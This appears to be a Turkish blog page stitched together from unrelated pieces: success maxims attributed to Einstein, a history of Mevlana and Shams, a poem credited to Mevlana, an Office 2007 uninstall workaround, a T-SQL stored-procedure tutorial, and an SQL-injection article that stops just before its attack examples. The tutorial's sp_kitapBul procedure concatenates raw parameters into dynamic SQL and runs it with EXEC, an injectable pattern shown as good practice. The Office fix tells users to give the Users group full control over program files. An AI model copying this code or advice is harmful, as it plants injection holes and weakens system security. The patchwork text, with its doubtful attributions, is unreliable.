1. Merakınızın peşinden gidin
‘Benim özel bir yeteneğim yok. Yalnızca tutkulu bir meraklıyım.’
Sizin merakınızı çeken nedir? Neyi en çok merak ediyorsunuz? Benim merak ettiğim neden bazı insanların başarılı olup bazılarının olamadığıdır. Bu yüzden yıllarca başarı üzerine çalıştım. Merakınızın peşinden giderseniz başarıya ulaşırsınız.

2. Azim paha biçilmezdir
‘Çok zeki olduğumdan değil, sorunlarla uğraşmaktan vazgeçmediğimden başarıyorum.’
Belirlediğiniz yolun sonuna ulaşacak kadar sabırlı mısınız? Posta pullarının gideceği yere varasıya kadar mektuba yapışıp kalmasından ötürü çok değerli olduğu söylenir. Posta pulu gibi olun ve başladığınız işi bitirin.

3. Bugüne odaklanın
‘Güzel bir kızı öperken düzgün araba kullanan birisi, öpücüğe hak ettiği dikkati vermiyor demektir.’
İki atı aynı anda süremezsiniz. Bir şeyler yapabilirsiniz ama her şeyi yapamazsınız. Şimdiye odaklanın ve bütün enerjinizi şu anda yaptığınız işe verin.

4. Hayal gücü güç verir
‘Hayal gücü her şeydir. Sizi bekleyen güzelliklerin önizlemesi gibidir. Hayal gücü bilgiden daha önemlidir.’
Hayal gücünüz geleceğinizi belirler. Einstein şöyle der: ‘Zekanın gerçek göstergesi hayal gücüdür, bilgi değil’. Bu yüzden hayal gücünüzün hantallaşmasına izin vermeyin.’

5. Hata yapın
‘Hiç hata yapmamış bir insan yeni bir şey denememiş demektir.’
Hata yapmaktan korkmayın. Eğer nasıl okuyacağınızı bilirseniz hatalar sizi daha iyi bir konuma getirebilir. Başarılı olmak istiyorsanız yaptığınız hataları üçe katlayın.

6. Anı yaşayın
‘Ben geleceği hiç düşünmem, ne de olsa gelecektir.’
Geleceği ayarlamanın tek yolu olabilidiğiniz kadar şimdide olmaktır. Şu anda dünü ya da yarını değiştiremezsiniz. Önemli olan tek an şimdidir.

7. Değer yaratın
‘Başarılı olmaya değil, değerli olmaya çalışın.’
Zamanınızı başarılı olmak için harcamayın, değerler yaratın. Eğer değerli olursanız başarı kendiliğinden gelecektir.

8. Farklı sonuçlar beklemeyin
‘Delilik: Aynı şeyleri tekrar tekrar yapıp farklı sonuçlar beklemek.’
Hergün aynı rutinde yaşayarak farklı görünmeyi bekleyemezsiniz. Hayatınızın değişmesini istiyorsanız kendinizi değiştirmelisiniz.

9. Bilgi deneyimden gelir
‘Bilgi malumat değildir. Bilmenin tek yolu deneyimlemektir.’
Bir konuyu tartışabilirsiniz ama bu size sadece felsefi bir anlayış kazandırır. Bir konuyu bilmek istiyorsanız onu deneyimlemelisiniz.

10. Kuralları öğrenin, daha iyi oynayın
‘Oyunun kurallarını öğrenmek zorundasınız. Böylece herkesten iyi oynayabilirsiniz.’

Yapmanız gereken iki şey var. Birincisi oynadığınız oyunun kurallarını öğrenmek. İkincisi ise oyunu herkesten iyi oynamayı istemek. Bu iki şeyi yaparsanız başarı sizinle olur!

Seyyid Burhaneddin Tırmızi’nin Kayseri’ye gittikten sonra henüz bir yıl geçmemişken vefat etmesi üzerine, Mevlana Celaleddin beş sene sürecek bir yalnızlık ve bekleyiş devresine girmişti. Ne var ki bu özlem dolu yalnızlık, çok mutlu bir sonla noktalanacak, 1244′te Şems-i Tebrizi’nin Konya’ya gelmesiyle bitmiş olacaktı. (Bkz. Vakkasoğlu, Vehbi, Önce Alkışladılar Sonra Öldürdüler, İstanbul, 2001, s. 101) Fakat Konya’daki bu ilk buluşmadan daha evvel bir rivayete göre Mevlana 30 yaşında iken, Şam’da acayip kıyafetli bir adam onun yanına gelerek elini öpmüş ve “Alemin sarrafı beni tanı” dedikten sonra birden bire kalabalığın içine karışıp kaybolmuştur. (Bkz. Alkan, Ercan, İki Deniz, Keşkul, Haziran, 2004, sayı 1, s. 22)

Nihayet 1244 Ekimi yani 26 Cemaziyelahir, 642 tarihinde Mevlana, 38 Şems 60 yaşında iken Konya’daki ilk karşılaşmaları gerçekleşir. Artık beklenen zaman gelmiş ve kaderin önceden örülmüş tuğlaları zahirde de yerli yerine oturmaya başlamıştır. Başka bir ifade ile yanmak üzere hazırlanmış aşk çırası, Şems’in ateşiyle buluşmuştur. Konya’daki bu ilk karşılaşmalarında aralarında şöyle bir diyalog geçer:

“Şems: Hz Muhammed mi büyüktür Bayezid-i Bistami mi?

Mevlana: Elbette Muhammed (a.s.) bütün enbiya ve evliyanın büyüğüdür.

Şems: Peki ama Hz Muhammed: “Yarabbi seni tenzih ederim. Biz seni gereğince bilemedik. Sana günde yetmiş kere istiğfar ederim” buyurduğu halde Bayezid: “Kendimi noksan sıfatlardan arıtırım. Makamım ne kadar yüce ki cübbemin içinde Allah’tan gayrı varlık yok” demektedir buna ne buyrulur.

Mevlana: Bu tabiidir. Çünkü Allah’ın mahbubu Muhammed (a.s.) günde yetmiş makam aşıyor ve ulaştığı her makamda önceki bilgisinden istiğfar ediyor. “Ey bizim idrakimizden üstün olan Allah biz Seni gereğince bilemedik” diyordu. Bayezid ise bir makam aştı, bir tecelli ile kendinden geçti. Daha fazlasına eremediği için taştı ve öyle yerli yersiz söylendi.” (Kabaklı, a.g.e., s. 30,31)

Bu karşılaşmayla Mevlana ve Şems arasındaki dostluğun temelleri atılmış oldu. Mevlana, Şems Konya’ya geldikten sonra artık dersi ve vaazı bırakmış, onun emriyle semaya koyulmuş, şiir söylemeye başlamıştı. Söylediği şiirler ise, görüntüde din sınırlarını adamakıllı aşmaktaydı. Bu durum karşısında Mevlana’nın sevenleri kıskançlık gösteriyor, Şems’in büyü ve telkin ile onu yoldan çıkardığını düşünüyorlardı. Şems’in sohbetlerinde bulunanlar, bu coşkun erin sözlerine asla tahammül edemiyorlardı. Bütün bunlar Mevlana’yı yoldan çıkaran, belki de onlarca dinsiz imansız eden Şems’in aleyhine bir cereyan meydana getirmişti. Fakat Şems-i Tebrizî onların davranışlarına hiç aldırmıyor, art arda pervasızca tok sözlerini sarf etmeye devam ediyordu. Özellikle de Mevlana’nın eski çevresine karşı kırıcı ve hırçın davranışlar sergiliyordu. Aşk ve cezbe haline giren Mevlana ise, Şems’i etrafındaki herkese üstün tuttuğunu söylüyor ve onun dostluğunu hiçbir şeye değişemeyeceğini çeşitli ortamlarda defalarca dile getiriyordu. Hatta Şems’i kötülemek için kendisine gelenlere de gücenmekteydi. (Bkz. Gölpınarlı, a.g.e. s. 13; Kabaklı, a.g.e. s. 42, 43)

Anlaşılan odur ki, Mevlana Şems’ten sonra hayli değişmiştir fakat bu değişimin bir anda olduğu söylenemez. Sezai Karakoç bu “değişim” konusunda şöyle söylemektedir: “Kimileri sanır ki Mevlana’da belli bir andan sonra ansızın büyük bir değişiklik olmuş, birden bire olduğundan bambaşka bir Mevlana doğmuştur. Oysa hiç bir değişim ve oluşum birden bire olmaz. Derinlerde görünmeyen planda, yavaş ve uzun bir hazırlanma dönemi olur. Bir deprem gibi. Biz sanırız ki deprem ansızın olur.” (Karakoç, Sezai, Mevlana, İstanbul, 1999, s. 20)

Mevlana’daki değişim beraberinde birçok problemleri de getirmişti. Zira Mevlana’nın etrafında Güneş’i kıskanan müritleri bulunmaktaydı ve onlar istiyordu ki Güneş sadece kendilerine ışık versin. Oysa Güneş herkesi aydınlatmaya yeterdi. Derken günler geceleri kovalıyor ve Konya’daki Şems aleyhtarlığı giderek artıyordu. Mevlana’nın oğlu Sultan Veled, Şems’e karşı oluşan Konya’daki nefret tufanını ve olumsuz propaganda cereyanını “İbtida Name”de şöyle anlatır: “Hepsi de kınamaya koyuldu. Gerçekten haberi olmayan ve bir sürüye benzeyen o müritler birbirlerine; neden şeyhimiz, onun gibi birisine kapılsın da bizden yüz çevirsin? Hepimiz kişizadeyiz, ona kuluz, köleyiz, aşığız. Bizce onun Tanrı mazharı olduğunda şüphe yok, ondan birçok keremler gördük. Gördüklerimizi, az kişi görmüştür. Her kulak öyle sözler duyamaz. Doğan kuşu gibi avlandık, ona birçok avlar getirdik. Mevlana, bizim yüzümüzden tanındı. Dostu sevindi, düşmanı kahroldu. Bu böyleyken kim oluyor bu Şemseddin ki şeyhimiz, ona alındı, yüzümüze bile bakmıyor. Artık yüzünü göremez olduk. Büyücü müdür nedir? Sihirle kendisini şeyhe sevdirdi. Ne aslı belli ne nesli… Nereli olduğunu bile layığıyla bilmiyoruz. Halk vaazdan mahrum oldu, kutlu talihimiz döndü diyorlardı. Bazen Şemseddin’i gördükçe kılıçlarına el atıyor, yüzüne karşı sövüyorlardı. Hepsi Şemseddin’in Konya’dan gitmesini yahut ölmesini bekliyordu.” (Gölpınarlı, a.g.e., s. 13,14)

Şems, kendisine karşı oluşan nefretin Konya’da yayılması üzerine 15 Şubat 1246′da Mevlana’ya haber vermeden ansızın ortadan kayboldu. Bu sefer de hicran ateşi ile yanıp kavrulan Mevlana, ayrılığın acısıyla inlemeye başlamıştı. Böylece şairliğinin de yakıcı devresine girmiş oldu. Derken bir gün, bu acıya su serpecek bir mektup geldi, mektup Şems’ten gelmekteydi. Şam’da olduğu anlaşılan Şems’e bir mektup da Mevlana yazdı ve mektubu oğlu Sultan Veled’e vererek ona gönderdi. Uğurlarken de oğluna “Git onu çağır, kendisini incitenler çoktan pişman oldular, ben ise yokluğuna dayanamıyorum. Lütfetsin gelsin artık” diye söylemişti.

Sultan Veled mektubu yerine ulaştırdı ve Şems’i de alarak Konya’ya geri döndü. 8 Mayıs 1247 tarihinde Şems’in Konya’ya dönüşüyle Mevlana’nın hasret gözyaşları dinmiş ve yerini sevinç gözyaşlarına bırakmıştı. Acı dolu o ayrılık günleri artık geride kalmıştı fakat ne yazıktı ki bu kavuşma anı çok uzun sürmeyecekti. Çünkü Şems’e karşı kurulan kin ve nifak kazanları, yeniden kaynatılmaya başlanmıştı. (Bkz. Kabaklı, a.g.e., s. 43, 44)

Şemsin ikinci kayboluşu ise birincisinden çok daha muammalıdır. Onun sırrolması konusunda çok değişik rivayetler olmakla birlikte Şems’in nasıl kaybolduğu konusu halen gizemini sürdürmektedir. Sultan Veled’in İbtida Name’sinde ve Eflaki’nin Menakib’ül Arifin’de bu konudaki bazı rivayetlere yer verilmiştir.

Kaynaklar incelendiğinde bu esrarengiz kayboluşun kesin olmamakla birlikte şöyle gerçekleşmiş olabileceği düşünülmektedir: “Bir gece Mevlana ile otururken, dışarıdan biri onu çağırdı. Şems kendisini katle davet ettiklerini söyleyerek çıktı. Dışarıda pusu kurulmuştu. Bıçak üşürerek öldürmek istediler, lakin Şems bir nara atınca, içlerinde Mevlana’nın ortanca oğlu Alaaddin de bulunan o cemaat bihuş oldular; akılları başlarına geldiği zaman yerde birkaç damla kan gördüler. Ondan sonra bir daha Şems’in izi bulunamadı.” (Vakkasoğlu, a.g.e., s. 102)

Gölpınarlı ise olayı şöyle anlatır: “1247 yılı Aralık ayının beşinci Perşembe günü, İçlerinde Mevlana’nın oğlu Alaaddin’in de bulunduğu yedi kişi, Şems’e bir pusu kurdular; onu öldürüp cesedini battal bir kuyuya attılar. Sonradan bunu duyan Sultan Veled bir gece bazı dostlarıyla gidip cesedi kuyudan çıkardı.” (Gölpınarlı, a.g.e., s. 15)

“Mevlana Şemseddin’i inciten bu küçük oğlunu affedememişti. Küskünlük ve nefretinin ne kadar uzun sürüldüğüne bakılsın ki, Şems’in vefatından on beş yıl sonra 1262′ de ölen Alaaddin’in cenazesinde bulunmamış, namazını da kılmamıştı. Eflaki; Ancak ölümünden bir hayli sonra oğlunun mezarı başına gittiğini, kireçle sıvanmış kabri üzerine “Yarabbi! Senden yalnız iyilik sahipleri kerem umarsa; / Mücrim olanlar kime dayansın, kime sığınsın?” diye Arapça bir beyit yazdığını ayrıca ‘Mana aleminde Şemseddin’i gördüm, Alaaddin ile barıştı onu bağışladı. O da rahmete kavuşanlar arasına girdi’ dediğini nakletmektedir.” (Kabaklı, a.g.e., s. 36)

Mevlana ve Şems ikilisinin birbirine olan bağlılıkları o dereceye ulaşmıştır ki, Şems’in vefatından sonra yaşanan şu olay bunu en güzel şekilde ortaya koyar: “Bir gün Mevlana’ya birisi ‘Şems’i gördüm’ diye haber verir. Bu haberden sonra Mevlana üstünde bulunan feraceyi ona bağışlar. Hizmetinde bulunan kimseler bu şahsın yalan söylediğini, böyle bir şeyin olmasının imkânsızlığını her ne kadar belirtirlerse de Hazreti Mevlana ‘Bu Feraceyi onun söylemiş olduğu yalana bağışlıyorum. Şayet dosttan doğru bir haber getirmiş olsaydı canımı bile verirdim’ diye mukabelede bulunur.” (Alkan, a.g.e., s. 24)

Şems’in bu hazin kayboluşu sadece Mevlana’yı hüzünlere gark etmemiş, asırlar sonrasında yaşayan sevenlerinin de içlerinin oyulmasına neden olmuştu. Bu esrarengiz veliyi hiç görmedikleri halde seven birçok insanı da acı ile karışık bir düşünme evresine sevk etmişti. Neticede sırroluşunun mahiyeti her ne olursa olsun, onu Mevlana ile buluşturan da, ondan ayıran ve muammalı bir şekilde kaybolmasına sebep olan da kader ipini elinde tutan Cenab-ı Mevla’ydı. Bu hikâye burada bitmeyecek, bu ayrılık böyle yarım kalmayacaktır. Belki de bambaşka bir ortamda, bambaşka bir şekilde neşeli bir kavuşma ile nihayetlenecektir.

Geçmişini, acılarını ve hayal kırıklıklarını değiştiremem, ne de gelecekte olacakları.
Ama yardım etmek için yanında olabilirim.

Ayağının kaymasını engelleyemem.
Ama düşmemen ve tutunman için sana elimi uzatabilirim.

Eğlencelerin, zaferlerin, başarıların ve Mutluluğun benim değil.
Ama bunları neşe içinde seninle paylaşabilirim.

Hayatta yapman için aldığın kararlar benim değil, yargılarında.
Ama sana destek olabilir, cesaret verebilir ve istediğinde yardım edebilirim.

Yollarımızın, değerlerimizin, ikimizin ayrı düşmesini Engelleyemem.
Ama senin için dua edebilir, seninle konuşabilir ve tartışabilirim.

Kalbinin kırılmasını ve acı çekmeni önleyemem.
Ama seninle birlikte ağlayabilir, kırık parçaları toplamak ve yerine koymak için yardım edebilirim.

Sana kim olduğunu söyleyemem.
Ama senin kardeşin ve DOSTun olabilirim..

Mevlana

Bilgisayarım’a tıklayın ve  C:\Program Files\Common Files\microsoft shared\OFFICE12\Office Setup Controller  içindeki Proof.en ve Proof.tr klasörlerinin içindeki XML belgelerini not defteri ile açın, metni tamamiyle silin ve aşağıdaki metni oraya kopyalayıp kaydedin. Eğer Windows7 veya Vista kullanıyorsanız izin vermeyebilir. İzin vermediği takdirde XML üzerinde sağa tıklayıp özellikler, Ordan gücenlik, Ordan Users’in yetki izinlerine full yetki verin ve onaylayın.  XML değişikliklerini yaptıktan sonra sorun çözülmüştür. Şimdi kaldırmayı tekrar deneyebillirsin…

<?xml version=”1.0″ encoding=”utf-8″?>
<!–_SIG=o6qjGNt0P98N1PiQH9LsdM+Qxxa1LCTungnlKXKQoI5nvd6KPOCpdGSjKqZWUT3QX4ujQaKWPsv+xPdzxq7T/m3qICTZI7PQLxERc//iRCuf3cebwwnQpV8g65Edqv0KqNPn/pTBBIx8i38l1WMw23Wpo7oOwICsJy2BF2dx2n8=–>
<Package Id=”Proof.en-us” Type=”MSI” Path=”Proof.MSI” Version=”1.0″ ProductCode=”{90120000-001F-0409-0000-0000000FF1CE}” MSIVersion=”12.0.4518.1014″ Platform=”x86″>
<Feature Id=”FindAllWordFormsFiles_1033″ Cost=”500643″>
<OptionRef Id=”FindAllWordFormsFiles_1033″/>
</Feature>
<Feature Id=”Gimme_OnDemandData” Cost=”0″>
<OptionRef Id=”Gimme_OnDemandData”/>
</Feature>
<Feature Id=”SpellingAndGrammarFiles_1033″ Cost=”39828097″>
<OptionRef Id=”SpellingAndGrammarFiles_1033″/>
</Feature>
<Feature Id=”ThesaurusFiles_1033″ Cost=”2754660″>
<OptionRef Id=”ThesaurusFiles_1033″/>
</Feature>
<Feature Id=”MsoInstalledPackagesScopedIntl_1033″ Cost=”0″>
<OptionRef Id=”AlwaysInstalled”/>
</Feature>
<Feature Id=”HyphenationFiles_1033″ Cost=”232281″>
<OptionRef Id=”HyphenationFiles_1033″/>
</Feature>
<Feature Id=”OCR_1033″ Cost=”9112900″>
<OptionRef Id=”OCR_1033″/>
</Feature>
<Feature Id=”SetupControllerFiles” Cost=”1248″>
<OptionRef Id=”AlwaysInstalled”/>
</Feature>
<Feature Id=”SetupXmlFiles” Cost=”1248″>
<OptionRef Id=”AlwaysInstalled”/>
</Feature>
</Package>

Kolay Gelsin.

P.S. Kaynak:  http://forum.donanimhaber.com/m_13212899/tm.htm#msglink_13224911

Nesneye dayalı programlama bu kadar popüler değilken, programlar sadece prosedür denilen parçacıklardan oluşurdu. Her bir prosedür, belli bir işlevi yerine getimrke için özenle yapılandırılmış program parçacığıdır. Mesela, iki sayı alıp bunların toplamlarını hesaplayan bir kod parçasını toplayıcı adında bir prosedür içerisine paketleyebiliriz. Bir prosedür, başka bir prosedür içerisinden çağrılabilir. Bu da sık kullanılan işlemler için yazılmış kodların bir defa yazılıp çok defa kullanılmasını böylelikle de programlamayı kolyalaştırmayı amaçlar.

Saklı prosedürler, bir çok gelişmiş programlama dilindeki fonksiyon yapılarına karşılık gelir. Birden fazla işlemi, paketlenmiş bir halde bir tek komut ile çalıştırmamız gerektiğinde stored procedures kullanılır. İşlemden kasıt T-SQL ile yapılabilen her şeydir.

Stored procedure, 1980’li yılların sonunda Sybase SQLServer ile birlikte kullanıma girdi. En büyük özelliği sorguların önceden hazırlanması(derlenemesi) ve VTYS ile aynı uzayda çalışmasından dolayı daha hızlı sonuç vermesidir.

Bir SP oluşturulduktan sonra, veritabanı sunucusunda saklanır. Her ihtiyaç duyulduğunda aynı sp defalarca çağrılabilir. Cursor gibi oturum kapandığında silinmez.

Network bazlı çalışmalarda ağ trafiği ve sistem kaynaklarının kullanımın düzenleyerek de performans artışı sağlar. Bir dize işlem, bir tek paket içerisinde yer alır. Gerektiğinde bir tek komut ile tetiklenebilir. Paketin tamamı çalışıncaya kadar istemde bulunan terminale hiçbir şey gönderilmez. Tüm komutlar bittiğinde bir tek sonuç gönderilir. Bu da bazı durumlarda ağ trafiğini rahatlatır.
Bir SP sistem tarafından oluşturulduğu anda şu aşamalara tabi tutulur:

1. SP’nin bileşenleri parçalara ayrıştırılır
2. Veritabanı içerisinde table,view gibi başka nesnelere atıfta bulunan referanslar varsa, geçerli olup olmadıkları kontrol edilir.(Geçerli:1-nesne varmı, 2-izin var mı)
3. Kontrollerden geçen SP’nin adı sysobjects tablosuna, kodları ise syscomments tablosuna saklanır.
4. Bu işlemlerle birlikte derleme işlemi yapılır. Normalizasyon işlemleri olarak da anılan bu işlemler sonucunda, ağaç şeması elde edilir. Bu şema da sysprocedures tablosunda saklanır.
5. SP herhangi bir anda çağrıldığında, ilk kez çalışıyorsa bu işlemler gerçekleştirilir. İlk sefa çağrılmıyorsa, kontrol, sorgulama ağacı oluşturma işlemleri yapılmaz ve oldukça hızlı bir şekilde SP’nin derlenmiş hali çalışır. Bundan dolayı sp’ler derlenen nesnelerden biri olarak anılır.

SP’ler şu faydaları sağlar:

1. Uygulamanın getirdiği bazı iş kuralları prosedür içinde tanımlanabilir. Bir kez oluştuktan sonra bu kurallar birden çok uygulama tarafından kullanılarak daha tutarlı bir veri yönetimi sağlanır. Ayrıca bir fonksiyonelliğin değişmesi ihtiyacı doğduğunda her uygulama için değişiklik yapmak yerine, sadece bir platformda değişiklik yapılır.

2. Tüm prosedürler üstün performansla çalışır ancak birden fazla çalıştırılacak olan prosedürler sorgulama planları procedure cache içinde saklandığından daha da hızlı çalışırlar.
3. Stored Procedure’ ler SQL Server start ettikten sonra otomatik olarak çalıştırılmak üzere ayarlanabilirler.
4. Stored Procedure’ ler harici olarak kullanılırlar. Trigger’ lardan farklı olarak prosedürler uygulama tarafından ya da script tarafından bir şekilde çağrılmak zorundadırlar. Otomatik devreye giremezler.
5. Stored Procedure’ lerın içinde SQL sorgulama diline ek olarak T-SQL komutlarını kullanabiliriz.
6.Kullanıcının bir tabloya erişim izni olmasa bile o tablo üzerinde işlem yapan bir stored procedure’ ü kullanma izni olabilir.

SP oluşturma:

CREATE PROC [ EDURE ] procedure_name [ ; number ]
[ { @parameter data_type }
[ VARYING ] [ = default ] [ OUTPUT ]  ]
[ ,...n ]
Örnek:
Çalıştırıldığı tarih itibariyle, aldığı kitapları getirmeyen üyelerin adını veren bir SP yazalım:

CREATE  PROCEDURE sp_cezaliUye
AS
– Bugünün tarihini al
DECLARE @buGun DATETIME
SET  @buGun = GetDate()

SELECT uyeAdi FROM odunc
WHERE geldiMi=0 AND VermeTarihi + VermeSuresi < @buGun
– bugünden önce gelmesi gereken ödünç işlemlerindeki üye adını seç.

Daha sonra bu SP şu komut ile çağrılır:

EXEC sp_cezaliUye
– sp_cezaliUye stored procedure’ünü çalıştır.

SP üstünde değişiklik yapmak istediğimizde ise,

Sp_helptext sp_adi

Diyerek SP’nin içeriğini görebiliriz.
Daha sonra bu içeriği Query Analyzer kod penceresine yapıştırıp,

ALTER PROCEDURE sp_cezaliUye
AS

DECLARE @buGun DATETIME
SET  @buGun = GetDate()

SELECT uyeAdi FROM odunc
WHERE geldiMi=0 AND VermeTarihi + VermeSuresi < @buGun

Diyerek yeni halini kaydettirebiliriz.

İPUCU:
Bir çok işlemi kod yazmaksızın yapmayı sağlayan Enterprise Manager’i kullanarak sp’leri de kolayca değiştirebilirisiniz. Bunun için Enterprise manager ile bir sp’yi seçip çift tıklamak yeterlidir.

SP’ye parametre yollama:
Bazen SP’ler dışarıdan parametre alabilirler:

Örnek:
Herhangi bir tarih verildiğinde, bu tarihte süresi bittiği halde teslim edilmeyen kitapları bulan bir SP yazalım ancak tarih olarak bu günden daha büyük bir parametre alamasın. Böyle bir durum olduğunda, bu günün tarihini versin.

CREATE  PROCEDURE sp_cezaliUye_1@referansTarih DATETIMEASDECLARE @buGun DATETIME SET @buGun = GetDate()IF @referansTarih > @buGun SET @referansTarih = @buGun — şayet, bugünün tarihi referans tarihten küçük ise,
referans tarihi bugünün tarihi ile değiştir.
SELECT uyeAdi FROM odunc
WHERE geldiMi=0 AND VermeTarihi + VermeSuresi < @referansTarih
– bugün veya daha eski bir tarihte, gelmemiş kitapları alan üyelerin listesini veren sorgu

Bazen dışarıdan gelen parametrelerin isteğe bağlı olması istenebilir.
Bu durumda DEFAULT değer atama seçeneği kullanılır. Şayet dışarıdan parametreye değer atanmazsa, geçerli değer default atanmış değer olarak alınır ve işlem yapılır:

Örnek:
CREATE  PROCEDURE sp_cezaliUye_2
@referansTarih DATETIME = NULL
– dışarıdan referans tarihi gelmedi ise, NULL olarak kabul et.
AS

DECLARE @buGun DATETIME
SET  @buGun = GetDate()

IF (@referansTarih IS NULL) OR (@referansTarih>@buGun)
SET @referansTarih = @buGun
– Referans tarih gelmedi ise veya bugünün tarihinden büyük ise, bugünün tarihini al.

SELECT uyeAdi FROM odunc
WHERE geldiMi=0 AND VermeTarihi + VermeSuresi < @referansTarih
Go

şeklinde yazabiliriz. Daha sonra

EXEC sp_cezaliUye_2 @referansTarih=’01.01.2003’

İle veya

EXEC sp_cezaliUye_2
Diyerek sp’yi çağırabiliriz.

DİKKAT:
SP’de bir parametre için default değer tanımı yaparken, bu değerin sabit bir değer veya NULL olması gerektiğine dikkat etmelidir.

İPUCU:
Bazı durumlarda, SP içerisinde SQL ifadesini bir değişkene atamak suretiyle durumlara göre dinamik olarak meydana getirip, daha sonra da onu çalıştırabiliriz. Bu durumda da EXEC fonksiyonu kullanılır. EXEC fonksiyonu, bir stored procedure batch’in ilk ifadesi değil ise de stored procedure çalıştırılırken kullanılmak zorundadır.

Örnek:

— Yanlış ifade(çalışmaz):
DECLARE @isim VARCHAR(10)
…
sp_cezaliUye_2

– Doğru ifade(çalışır)
DECLARE @isim VARCHAR(10)
….
EXEC sp_cezaliUye_2

Örnek:
Kitaplar tablosu üstünde aşağıdaki parametrelere göre arama yapabilecek bir SP yazalım. Parametrelerden gelenler için filtreleme yapılsın.
Dışarıdan alınabilecek Parametreler: ISBNNo, KitapAdi, Yazari, Ozeti

CREATE  PROCEDURE sp_kitapBul
@ISBNNo CHAR(16) =NULL,
@KitapAdi VARCHAR(55)=NULL,
@kitapYazari VARCHAR(55)=NULL,
@KitapOzeti VARCHAR(55)=NULL
AS

DECLARE @sSQL VARCHAR(500)
– Bir SQL değişkeni tanımlıyoruz
Set @sSQL= ‘SELECT * FROM Kitap WHERE 1=1 ‘
IF @ISBNNo IS NOT NULL
SET @sSQL = @sSQL + ‘  AND ISBNNo = ”’ + @ISBNNo + ””
– ISBNNo parametresi null değilse sorguya ekliyoruz.

IF @KitapAdi IS NOT NULL
SET @sSQL =@sSQL + ‘ AND KitapAdi  LIKE  ”%’  + @KitapAdi +  ‘%”’
– KitapAdi parametresi NULL değil ise sorguya ekliyoruz.

IF @KitapYazari IS NOT NULL
SET @sSQL = @sSQL + ‘ AND KitapYazari  LIKE  ”%’  + @KitapYazari +  ‘%”’
—KitapYazari Null değil ise sorguya ekliyoruz.

IF @KitapOzeti   IS NOT NULL
SET @sSQL = @sSQL + ‘  AND KitapOzeti  LIKE  ”%’  + @KitapOzeti +  ‘%”’
– kitapOzeti null değil ise sorguya ekliyoruz.
print @sSQL –nasıl bir SQL oluşturduğumuzu yazdırıyoruz.

EXEC(@sSQL)
– bir VARCHAR değişkenin içerdiği T-SQL ifadesini çalıştırıyoruz.

Farklı parametre değerleri ile SP’yi çağırabiliriz:

– sadece ISBN vererek çağıralım
EXEC Sp_kitapBul @ISBNNo=’12345’
– ISBN ve KitapAdi parametreleri ile çağırma
EXEC Sp_kitapBul @ISBNNo=’12345’, @kitapAdi=’Yol’

Dünyanin her tarafinda, kullanicilarina; kredi karti numaralari, kullanici bilgileri gibi gizli kalmasi gereken bilgilerin, ürünlere ve siparislere ait verilerin saklandigi uç-arka veri depolariyla hizmet veren web siteleri bulunmaktadir. Ve genel olarak, web sitelerindeki form araciligi ile alinan girdi ile veritabanindaki bilgiler filtrelendikten sonra sonucu kullaniciya gönderen bu tür sistemlerde Yapisal Sorgulama Dili (Structured Query Language – SQL) kullanilmaktadir. Uygulama içerisinde kullanilacak parametre degerleri alinirken kullanilan formun SQL Deyimini yeniden yapilandirabilecek bazi özel karakterlere izin vermesiyle güvenlik problemleri ortaya çikmaktadir.

Bu güvenlik problemleri kullanilarak bir uygulamanin arkasinda, bu uygulamaya destek veren veri tabani üzerindeki bütün bilgilere ulasilabilir veya bilgiler üzerinde degisiklik yapilabilir. Veya veri tabani sisteminin komutlari kullanilarak kullanilan sunucular üzerinde uygulama harici istenen islemler de yapilabilir. Bu problemlerden korunmak için de uygulama girdilerini bu tür karakterlere karsi kontrol eden fonksiyonlarin kullanilmali ve genis çapli uygulamalarin bu güvenlik açiklarini tasiyip tasimadigini anlamak için güvenlik denetimine tabi tutulmalidir..

Ilgilendiren Sektör ve Sirketler:

Özel olarak gelistirilmis uygulamalar kullanan tüm kurum ve kuruluslar
Internet / Intranet üzerinde uygulama gelistiren kuruluslar

——————————————————————————–

1. Bir Uygulama Güvenligi Problemi – ‘Yapisal Sorgulama Dili Kullanimi’

Yapisal Sorgulama Dili SQL’in uygulamalarda kullanimina örnek vermek gerekirse;

select Name, Address FROM Users WHERE UserID = ‘2081′

Seklindeki SQL Deyimi ‘Users’ adli tablodan ‘2081′ ürün ID si ile veritabanina kayitli olan kisiye ait olan isim ve adres bilgilerini dönecektir. Bu noktada muhtemel zayiflik, kullanilan formun SQL Deyimini yeniden yapilandirabilecek bazi özel karakterlere izin vermesiyle ortaya çikmaktadir. Çözümü ise girdilerden bu özel karakterlerin filtrelenmesini saglayan fonksiyonlardir.

Hizla gelisen internet teknolojileri karsisinda yeni pazarda geç olmadan yerini almak isteyen müsterilerine daha kisa sürede daha kullanisli ve ucuz çözümler sunmak zorunda olan uygulama gelistiriciler bu süreçte güvenlik gibi önemli bir faktörü ikinci plana atmaktadirlar.

Giderek yayginlasan ve medyanin haber potansiyelini olusturan; çalinan kredi karti numaralari, yer alti sitelerde dagitilan müsteri bilgileri, sirket projeleri – yazismalari yaklasan tehlikenin habercisi olmakla beraber halen bu tür kayiplarin yaratabilecegi maddi sonuçlari kavrayamayan ve hala ‘az maliyetle kurtarilan güvenlik projeleri’ ‘yle övünen yöneticilere uyari niteligi tasimaktadir. Öyleki -herzaman bir adim önde olmayi amaçlayan- saldirganlar güvenligin en üst seviyede olmasi beklenen devlet siteleri de dahil olmak üzere pek çok sisteme yönelik saldirilarina da ara vermeksizin devam etmektedirler.

Maddi ve manevi degere sahip sirketinizi bir anlamda is ortaklarini olan uygulama gelistiricilerin hazirladiklari uygulama ürünlerine emanet edildigini düsünürsek, ‘uygulamalariniza ne kadar güvenirsiniz?’ gibi bir soruya verilecek cevap büyük önem tasimaktadir.

Böyle bir ortamda uygun güvenlik çözümü için ayrilmis bütçe bir lüks degil her an yapilabilecek bir saldirida sirketin ugrayacagi zarari ortadan kaldirmak için alinmasi gereken önlem niteligi tasimaktadir.

2. Örnek Saldirilar – ‘Yapilacak Hamleleri Önceden Tahmin Edebilmek…’

Güvenlikte sikça kullanilan bir deyim; ‘Saldirganlardan korunabilmek için onlar gibi düsünmelisiniz!..’. Saldirganin sisteminize girmek için kullanabilecegi yöntemleri bilmek bu saldirilardan korunabilmek için alinan önlemleri daha saglikli kilacaktir.

Örneklerde kullanacagimiz hedef ; Microsoft® Internet Information Server™’ dan Microsoft® SQL Server™’a varsayilan sistem hesabi’ndan (sa) baglanan ASP tabanli bir kullanici hesabi yöneticisi olacak.
Form.asp : Username ve Password girdisini alan form.Solda…
Login.asp : Veritabani ile baglantiya geçen ve girdinin dogrulugunu kontrol eden ASP kodu.

2.1. Kötü Amaçli (’) Imleçleri Yardimiyla Izinsiz Giris Saglama:

